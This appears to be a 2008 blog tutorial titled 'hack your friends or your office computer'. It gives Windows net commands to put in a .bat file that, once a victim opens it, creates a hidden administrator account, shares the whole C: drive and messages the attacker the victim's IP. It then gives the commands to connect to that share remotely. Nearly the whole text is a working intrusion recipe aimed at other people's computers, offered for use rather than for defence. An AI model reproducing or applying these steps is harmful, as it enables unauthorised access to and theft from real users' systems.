Thursday, July 31, 2008

hack your friends or your office computer


in this tutorial we well use 3 of the commands listed herethey are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?Bat file is a piece of text that windows will execute as commands.Open notepad and whrite there:
dirpause
And now save this as test.bat and execute it.Funny aint it ?
---------------------- Starting ------------------- -:Server:-The plan here is to share the C: drive and make a new userwith administrators access
Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are okand the notebook will be used to make the .bat file.
Command n 1-> net user neo /addWhat does this do? It makes a new user called neo you can putany name you whant
Command n 2-> net localgroup administrators neo /addThis is the command that make your user go to the administratorsgroup.Depending on the windows version the name will be different.If you got an american version the name for the group is Administratorsand for the portuguese version is administradores so it's niceyo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimitedThis commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your.bat file and send to your friend.
-!extras!-Command n 4-> net send urip I am ur serverWhere it says urip you will insert your ip and when the victimopens the .bat it will send a message to your computer and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------Now that your friend opened your .bat file her system have theC: drive shared and a new administrator user.First we need to make a session with the remote computer withthe net use command , you will execute these commands from yourdos prompt.
Command n 1 -> net use file://victimip/ neoThis command will make a session between you and the victimOf course where it says victimip you will insert the victim ip.Command n 2-> explorer file://victimip/systemAnd this will open a explorer windows in the share system wich isthe C: drive with administrators access!

0 comments: